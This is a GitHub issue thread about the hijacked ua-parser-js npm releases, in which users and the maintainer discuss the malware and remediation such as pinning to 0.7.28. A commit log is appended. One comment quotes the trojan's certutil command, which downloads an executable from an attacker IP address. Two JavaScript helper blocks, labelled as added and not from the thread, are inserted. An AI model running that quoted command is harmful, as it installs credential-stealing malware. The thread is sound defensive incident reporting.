
Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js #536

Closed
SuperOleg39 opened this issue Oct 22, 2021 · 187 comments

Comments

@SuperOleg39

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use range ^0.7.28, or it is not safe?

Second question - Will you create a new package, or try to remove hijacked versions and continue update this package?

@nypinstripes

Ouch does that mean like there's malicious code in it or something?

@faisalman

@LyesIsogeo

LyesIsogeo commented Oct 22, 2021

I just updated the package and Windows Defender blocked "ceprolad.a", a trojan. I didn't have any internet access at that moment...
The trojan tries to execute in cmd: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe". The certutil -rulcacha -f downloads a .exe file.

@SuperOleg39
Author

SuperOleg39 commented Oct 22, 2021

Update - ^0.7.28 range is dangerous, 0.7.29 version already published.

We all need to fix 0.7.28 in our dependencies.
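An added example (not from this thread or the ua-parser-js project) that makes the point above concrete: a minimal implementation of npm's caret-range rule, enough to show that the range "^0.7.28" still resolves to the hijacked 0.7.29 while an exact pin "0.7.28" does not, and that publishing a clean 0.7.30 would make the same caret range resolve to the clean version instead. The registry snapshot is constructed; real range handling should use the `semver` package, which also covers prerelease tags and other operators.

```javascript
// Added example (not part of the issue thread): minimal caret-range matcher.
// Implements npm's caret rule for plain x.y.z versions (no prerelease tags).

const HIJACKED = ["0.7.29", "0.8.0", "1.0.0"]; // versions named in the issue

function parse(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v.trim());
  if (!m) throw new Error(`unsupported version: ${v}`);
  return m.slice(1).map(Number);
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// Exclusive upper bound of ^x.y.z: the first version that changes the
// leftmost non-zero component (0.7.28 -> 0.8.0, 1.0.0 -> 2.0.0, 0.0.2 -> 0.0.3).
function caretUpper([x, y, z]) {
  if (x > 0) return [x + 1, 0, 0];
  if (y > 0) return [0, y + 1, 0];
  return [0, 0, z + 1];
}

// True when `version` is inside `range`; `range` is either "^x.y.z" or an exact pin.
function satisfies(version, range) {
  const v = parse(version);
  if (range.startsWith("^")) {
    const base = parse(range.slice(1));
    return cmp(v, base) >= 0 && cmp(v, caretUpper(base)) < 0;
  }
  return cmp(v, parse(range)) === 0;
}

// Which of the hijacked versions a given range would still accept.
function hijackedVersionsAllowed(range) {
  return HIJACKED.filter((v) => satisfies(v, range));
}

// The version npm would install for `range` given the versions available:
// the highest one that satisfies the range, or null if none does.
function resolve(range, available) {
  const ok = available.filter((v) => satisfies(v, range)).map(parse);
  if (!ok.length) return null;
  ok.sort(cmp);
  return ok[ok.length - 1].join(".");
}

// Constructed snapshot of the registry as described in the thread.
const REGISTRY = ["0.7.27", "0.7.28", "0.7.29", "0.8.0", "1.0.0"];

console.log("^0.7.28 resolves to", resolve("^0.7.28", REGISTRY)); // 0.7.29 (hijacked)
console.log("0.7.28 resolves to", resolve("0.7.28", REGISTRY)); // 0.7.28
console.log("after a clean 0.7.30:", resolve("^0.7.28", REGISTRY.concat("0.7.30"))); // 0.7.30
console.log("hijacked versions admitted by ^0.7.28:", hijackedVersionsAllowed("^0.7.28"));
```

The same matcher also shows why "^0.8.0" and "^1.0.0" are no safer: 0.8.0 and 1.0.0 sit at the bottom of their own caret ranges, so anything that has not pinned an exact version picks them up until a higher clean release exists.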

@SuperOleg39
Author

@faisalman I hope you can revert versions with vulnerabilities?

@KalleOlaviNiemitalo

0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.

@alex-drocks

alex-drocks commented Oct 22, 2021

Revert back to 0.7.28; all greater versions are infected. My computer was infected this morning when I updated my Docusaurus version.
https://twitter.com/DrocksAlex/status/1451543176779534342

NPM official flag: https://www.npmjs.com/package/ua-parser-js

@Tom910

Tom910 commented Oct 22, 2021

The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump to the vulnerable version

@faisalman
Owner

Hi all, very sorry about this.

I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don't realize something was up, luckily the effect is quite the contrary).

I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0

I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.

@KalleOlaviNiemitalo

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

@ohanedan

ohanedan commented Oct 22, 2021

I think we should publish new versions above these hijacked versions.

Like:
0.7.30
0.8.1
1.0.1

@SuperOleg39
Author

> I think we should publish new versions above these hijacked versions.
>
> Like:
> 0.7.30
> 0.8.1
> 1.0.1

Little problem with that decision: it will be hard to remove these versions in the future.

So ua-parser-js will need to bump the version to 2.0.0 when it wants to push real updates.

@benjilebon

Extra carefulness is required because it seems to be affecting Linux machines as well; make sure the miner doesn't get installed on your servers & CI stuff.

For now it seems to only hang in installing because the url containing the infection doesn't seem to be working, but it may not last

Linux users can use this command to see if the miner is running or not and stop it: ps -aux | grep jsextension

@ohanedan

> I think we should publish new versions above these hijacked versions.
> Like:
> 0.7.30
> 0.8.1
> 1.0.1
>
> Little problem with that decision: it will be hard to remove these versions in the future.
>
> So ua-parser-js will need to bump the version to 2.0.0 when it wants to push real updates.

That's right, but it's the safest method I think. You can continue with version 2.0.0, and users who don't specify a specific version will not be affected.

@faisalman
Owner

> @faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Yes I've sent the report using that form, hope they can just be removed. Otherwise, I have to publish under new versions.

@aimozg

aimozg commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

@alex-drocks

> This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

@faisalman
Owner

> This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

You're right... Ok then.

@aimozg

aimozg commented Oct 22, 2021

> > This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.
>
> Does it? I'd have to change all my passwords.

I've dropped the DLL it runs on VirusTotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior
It reads browser user data files, and I've checked "files written" against my infected PC; it does look like a script to export OS credentials and a copy of the cookies DB file from Chrome.

@gaelhuot

We fixed it using this in our package.json:
"resolutions": { "**/ua-parser-js": "0.7.28" }

@faisalman
Owner

> I think we should publish new versions above these hijacked versions.
>
> Like: 0.7.30 0.8.1 1.0.1

Done. Thanks for the suggestion 👍

@Cphusion

Cphusion commented Oct 22, 2021

a solution that we're using to address this vulnerability is to set the resolutions in package.json to use the last good version:

...},"resolutions": { "ua-parser-js": "0.7.28" },...

That resolution will come in handy when using a library that depends on the latest of ua-parser-js as opposed to using ua-parser-js directly in your package.json dependencies.
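An added example (not from this thread or the ua-parser-js project) to go with the two resolutions comments above: before trusting a resolution, it helps to know whether a hijacked copy is actually present, and where. The script below scans a package-lock.json for ua-parser-js entries at the three versions named in this issue, including transitive copies nested under another package, which is exactly the case the "**/ua-parser-js" glob in the first comment addresses. It handles lockfileVersion 1 (nested "dependencies" tree) and 2/3 ("packages" map keyed by install path), based on those formats as I know them; the lockfile contents are constructed for the example.

```javascript
// Added example (not part of the issue thread): find hijacked ua-parser-js
// copies in a package-lock.json, direct or transitive.

const HIJACKED = new Set(["0.7.29", "0.8.0", "1.0.0"]); // versions named in the issue

// lockfileVersion 1: "dependencies" is a tree; nested copies live under
// <parent>.dependencies. Record each entry with the path it is installed at.
function walkV1(deps, prefix, out) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const path = `${prefix}node_modules/${name}`;
    out.push({ name, version: entry.version, path });
    walkV1(entry.dependencies, path + "/", out);
  }
}

// Flatten either lockfile format into [{ name, version, path }].
function listInstalled(lock) {
  const out = [];
  if (lock.packages) {
    // v2/v3: keys are install paths such as "node_modules/a/node_modules/b";
    // "" is the root project itself, so it is skipped.
    const marker = "node_modules/";
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === "") continue;
      const name = path.slice(path.lastIndexOf(marker) + marker.length);
      out.push({ name, version: entry.version, path });
    }
  } else {
    walkV1(lock.dependencies, "", out);
  }
  return out;
}

// Every installed copy of `pkg` whose version is one of the hijacked releases.
function findHijacked(lock, pkg = "ua-parser-js") {
  return listInstalled(lock).filter((e) => e.name === pkg && HIJACKED.has(e.version));
}

// Constructed v2 lockfile: the direct dependency is pinned to 0.7.28, but a
// library's "^0.7.28" range pulled a second, nested copy at 0.7.29.
const SAMPLE_LOCK = {
  lockfileVersion: 2,
  packages: {
    "": { name: "app", version: "1.0.0" },
    "node_modules/ua-parser-js": { version: "0.7.28" },
    "node_modules/some-lib": { version: "3.1.0", dependencies: { "ua-parser-js": "^0.7.28" } },
    "node_modules/some-lib/node_modules/ua-parser-js": { version: "0.7.29" },
  },
};

// Constructed v1 lockfile with the same shape: nested copy at 1.0.0.
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    "ua-parser-js": { version: "0.7.28" },
    "some-lib": {
      version: "3.1.0",
      requires: { "ua-parser-js": "^1.0.0" },
      dependencies: { "ua-parser-js": { version: "1.0.0" } },
    },
  },
};

for (const lock of [SAMPLE_LOCK, SAMPLE_LOCK_V1]) {
  const hits = findHijacked(lock);
  console.log(`lockfileVersion ${lock.lockfileVersion}: ${hits.length} hijacked copy(ies)`);
  for (const h of hits) console.log(`  ${h.path} -> ${h.version}`);
}
```

A scan that comes back empty for the direct dependency but non-empty for a nested path is the situation where a resolution keyed only on "ua-parser-js" may not reach the copy that matters, and the "**/ua-parser-js" form (or a fresh install after the resolution is added) is needed; re-running the scan on the regenerated lockfile confirms the fix took.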

Dafnik added a commit to DatepollSystems/WaiterRobot-Web that referenced this issue Nov 29, 2022
smoroz pushed a commit to optimizely/ua-parser-js that referenced this issue Feb 3, 2023
* FIX: Wechat Desktop for Windows compatible with new version

* Move to check typeof for window for different envs

* Fix faisalman#413 Bug resulting Motorola model O

* Fix faisalman#367 faisalman#425 Detect Instagram in-app browser

* Add funding support links

* Fix faisalman#450 Sony Xperia Z2 Tablet

* Fix faisalman#454 Improve Samsung detection

* Add Nintendo Switch

* Fix faisalman#366 Amazon Alexa Echo Show

* Fix faisalman#339 Add Weibo

* Fix faisalman#407 ZTE Nubia misidentified as Nextbook Tablet

* FIX: new wechat desktop's unsafe regex

* Fix faisalman#433 faisalman#434 Huawei devices

* Fix faisalman#475 Nokia version incomplete

* Fix faisalman#470 Identify Android TV as SmartTV

* Latest Xperia lineup

* Fix faisalman#430 Playstation 5

* Fix faisalman#449 Lenovo Tablet

* Casually save some bytes

* Fix faisalman#401 Rearrange the order of regexes to improve hit-rate performance

* Fix faisalman#427 - Trying GitHub Actions

* Change mocha reporter for CI

* Action doesn't work, should be under /.github/workflows folder perhaps

* Fix faisalman#438 Add Zebra devices

* Update README contents & structures

* Enforce maximum limit to user-agent input

* Move documentation upwards and..mAkE tHe LoG0 BiG99eR!!1!1!

* Add CDN links & insert npm fund

* Fix faisalman#422 Add ARMHF in CPU Arch detection

* Fix faisalman#279 Remap old Edge versions <= 44 as suggested by @mikemaccana @callaginn

* Fix faisalman#448 Add AT&T & Vodafone devices

* Fix faisalman#209 Add CHANGELOG

* Add Electron

* Simplify Huawei detection

* Release as 0.7.25

* Refine some OS detection

* Add new OS: Raspbian

* Add Device: Surface Duo

* Add some test cases for Samsung, Huawei, Xiaomi

* Detect ARMEABI as ARM

* Casually save some bytes

* Refine some detection with more test cases

* Add new device.vendor: Vivo

* Fix faisalman#342 - Enforce all regexes to comply with safe-regex as a safeguard against possible ReDoS vulnerability

* Fix regexes that were marked as unsafe by safe-regex module

* Refine device detection with more test cases

* Add new device.vendor: Realme

* Release as 0.7.26

* Better tablet detection:
- Huawei MediaPad M/T
- Galaxy Tab SM-P
- Kindle Fire without Silk

* Better tablet detection:
- Fix lenovo phone / tablet detection

* Better tablet detection - Build.

* Better tablet detection:
- iPad using Facebook browser on some occasions
- More Huawei tablets
- Asus ZenPad Z8s (P00J)

* Small refactor

* Add new Engine & Browser: Flow

* Add new browser: Firefox Reality

* Add new device: Fairphone

* Add string check to setUA method

* Release as 0.7.27

* More test for latest phones with unique form factor (fold/flip/qwerty/swivel)

* Add new device & browser: Tesla

* Minor rearrangement

* More test for tablet devices

* Update contributor list

* Fix faisalman#492 LG TV WebOS detection

* Delete redundant code

* Refactor code: saving bytes towards 15KB minified

* Update readme: use https for demo link

* Test for Firefox UAs, add new browser: Klar, add new OS: Maemo

Source: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent/Firefox

* Revert breaking fix faisalman#279 and release as 0.7.28

* Improve detection rule for Mac on PowerPC

* Improve device detection: categorize PDA as mobile

* Improve browser detection: Netscape with version

* Improve os detection: Windows Mobile without version

* Add new OS: HP-UX

* Add new browsers: Obigo, UP.Browser

* Add new device vendor: Roku

Source: https://github.com/WhichBrowser/Parser-PHP/blob/master/tests/data/television/roku.yaml

* Refine some OS detection

Source:
- https://www.zytrax.com/tech/web/browser_ids.htm
- https://developers.whatismybrowser.com/useragents/explore/operating_system_name/

* Remove oldEdge map

* Replace `\s` with space, saving ~0,3KB

* ES3 compat-fix: remove trailing comma

* Improve device detection: Huawei, Xiaomi, Realme, LG, OnePlus, ASUS, ZTE, Fairphone

* Improve CPU detection for ARM64

* Improve device detection: LG Android TV

* Add new OS: Android-x86, Deepin, elementary OS, GhostBSD, Linspire, Manjaro, Sabayon

User-Agent source: whatismybrowser.com

* Fix faisalman#500 Sharp devices misjudged as Huawei devices

* Fix faisalman#506 - add test for Huawei ART-L29

* Fix faisalman#509 add support for Internet Explorer 8

* Create SECURITY.md

A simple instruction for security researchers.

* Improve regex efficiency when trimming long ua string

https://blog.stevenlevithan.com/archives/faster-trim-javascript

* Add Huawei models

* Sony Xperia 1ii

* Samsung Galaxy S20 5G

* Add different oculus browser

* Oculus devices

* cleanup

* cleanup

* change to single line regex

* Enable to detect OPPO Reno5 A correctly.

* Securing the 0.7.x version (issue faisalman#536)

* Securing the 0.8.x version (issue faisalman#536)

* Securing the 1.x version (issue faisalman#536)

* feat: require the use of `===` and `!==`

* Update ua-parser.js

* ✨ Use AST to verify whether regexes are safe

* Bump version 0.7.31

* Fix faisalman#559: Sony Xperia 1 III misidentified as Acer tablet

* Fix faisalman#533: Detect Sony BRAVIA as SmartTV

* Fix faisalman#562 - Xiaomi Mi CC9

* Fix faisalman#561 - Increase UA_MAX_LENGTH to 275

* pr feedback

* v100 tests

* Add support for HuaweiBrowser

* update readme

* package.json: specify the folders to include

* add KakaoTalk App, KakaoStory App regex

* Add Kakao App, Naver App

* Add iOS Naver, Kakao regex

* fix browser-test typo

* Add LinkedIn app.

* Rename 'HuaweiBrowser' to 'Huawei Browser'

* Fix faisalman#565 - Add new OS: HarmonyOS

* Fix faisalman#558 - WeGame mistakenly identified as WeChat

* Increase UA_MAX_LENGTH to 350

* Fix faisalman#532 - Detect Xiaomi Mi TV as smarttv

* Fix faisalman#513 - Add new browser: DuckDuckGo

* Fix faisalman#516 - Add Focus into list of possible browser.name

* ci: add GitHub token permissions for workflow

Signed-off-by: Varun Sharma <varunsh@stepsecurity.io>

* fixed sony bravia smart tv, added sharp AQUOS TV

* Safari and Mobile Safari began to include commas in the minor version numbers.

* Fix faisalman#502 faisalman#580 : Add notice for desktop device type

* Refine small redundancy

* Fix faisalman#596 - Detect Galaxy Tab S8 as tablet

* Add test case

* improved documentation

* Bump version 0.7.32

* Add new browser: Cobalt

* Fix documentation

`readme.md` refers to a `parser.getResults` function, which does not exist. This PR corrects the function name to `getResult`.

* Support Panasonic Viera Smart TVs

* Support Panasonic 2018+ smart tvs

* Add test for panasonic 2020 smart tv

* Add test for panasonic SAT receiver

* Support Loewe Smart TVs

* Add tests for JVC smart tvs

* Support philips smart tvs

* Add samsung testcases

* Add support for TechniSAT TVs and SATs

* Fix faisalman#605 - Identify Macintosh as Apple device

* Remove unsafe regex in trim() function

`trim()` function contains a regular expression that is vulnerable to ReDoS but was uncaught by `safe-regex` module.

* Bump version 0.7.33

* Fix faisalman#557 faisalman#612 faisalman#629 - Update the changelog

* Fix faisalman#621 - Detect Oculus Quest Pro

* Utilize navigator.userAgentData as a fallback faisalman#588

* Improve Kakao/Naver detection + add test

* Fix faisalman#619 - Move Sharp up to be checked before Huawei

* Rearrange the recently added smarttv detection

* Fix faisalman#620 - Add new Device: Kobo

* Fix faisalman#601 - Detect Chrome OS without version

* Update manifest

* fix: Don't act as a jQuery plugin

* build: 0.7.24 custom version

* Rebuilt min versions

---------

Signed-off-by: Varun Sharma <varunsh@stepsecurity.io>
Co-authored-by: ruicong <466403866@qq.com>
Co-authored-by: David Annez <david.annez@gmail.com>
Co-authored-by: Faisal Salman <f@faisalman.com>
Co-authored-by: sUP <dani3l@gmail.com>
Co-authored-by: o.drapeza <o.drapeza@tinkoff.ru>
Co-authored-by: liujunlve <liujunlve@henhaoji.com>
Co-authored-by: Ziding Zhang <zidingz@gmail.com>
Co-authored-by: Paris Morgan <paris@8thwall.com>
Co-authored-by: Ryohei Shima <shima01dev@gmail.com>
Co-authored-by: chenhui9279 <chenhui9279@autohome.com.cn>
Co-authored-by: sunny-mwx <30586210+sunny-mwx@users.noreply.github.com>
Co-authored-by: Hans Ott <hansott@hotmail.be>
Co-authored-by: XhmikosR <xhmikosr@gmail.com>
Co-authored-by: KnifeLemon <role___play@naver.com>
Co-authored-by: Dante <duanjl.china@gmail.com>
Co-authored-by: JBYoshi <12983479+JBYoshi@users.noreply.github.com>
Co-authored-by: Varun Sharma <varunsh@stepsecurity.io>
Co-authored-by: Jacky Choo <jackychoo@adly-macbook.local>
Co-authored-by: nabetama <mao.nabeta@gmail.com>
Co-authored-by: kNoAPP <alldoneb@gmail.com>
Co-authored-by: Mok <mok@moekm.com>
Co-authored-by: Oscar Becerra <oscarbecerra@google.com>
Co-authored-by: Riley Shaw <rileyjshaw@users.noreply.github.com>
Co-authored-by: Garrit Franke <garrit@slashdev.space>
Co-authored-by: Garrit Franke <32395585+garritfra@users.noreply.github.com>
Co-authored-by: smoroz <smoroz>
Co-authored-by: Spencer Wilson <spencer.wilson@optimizely.com>
Co-authored-by: Luis Rivas <luis.rivas024@gmail.com>
@faisalman faisalman unpinned this issue Feb 20, 2023